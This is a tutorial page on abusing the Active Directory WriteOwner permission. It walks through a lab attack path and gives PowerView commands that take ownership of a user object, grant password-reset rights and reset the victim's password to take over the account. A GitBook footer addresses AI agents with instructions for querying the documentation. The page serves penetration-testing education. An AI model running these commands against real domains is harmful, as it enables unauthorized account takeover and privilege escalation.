> For the complete documentation index, see [llms.txt](https://zflemingg1.gitbook.io/undergrad-tutorials/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://zflemingg1.gitbook.io/undergrad-tutorials/active-directory-acl-abuse/writeowner-exploit.md). # WriteOwner Exploit ## What is the WriteOwner Permission For? Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). The WriteOwner permission can be abused by an attacker to change the object owner to an attacker controlled user and take over the object ## Scenario: You have managed to compromise an account belonging to Tom. Running Bloodhound identified that there were was no direct access from Tom's account to Domain Admins. Checking **Outband Object Control** reveled an attack path from Tom to the **Backup Admin** group through Claire. ![Outband Control Option](/files/-MQDP-k8e4ZU3P5mcAq5) ![Attack Path Identified](/files/-MQDP5cmEv2AbdZsvO7z) #### Attack Path 1. Tom has `WriteOwner` permissions over Claire 2. Claire has `GenericWrite` permissions over the group `BACKUP_ADMINS` 3. `BACKUP_ADMINS` sounds interesting :) In order to easily take advantage of the `WriteOwner` and `GenericWrite` permissions, we’ll use `PowerView`, which is part of the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) collection. ``` ### Set tom as the owner of claire’s ACL Set-DomainObjectOwner -identity claire -OwnerIdentity tom ### Give tom permissions to change passwords on that ACL Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword ### Create powershell credential and change credentials. ### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force Set-DomainUserPassword -identity claire -accountpassword $cred ``` ![Screenshot for reference](/files/-MQDPJ19BsoNaV7xeZWa) Success. You can now login as Claire using the new password: **qwer1234QWER!@#$** ![](/files/-MQDPR_2VHlfytI5vBWx) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://zflemingg1.gitbook.io/undergrad-tutorials/active-directory-acl-abuse/writeowner-exploit.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.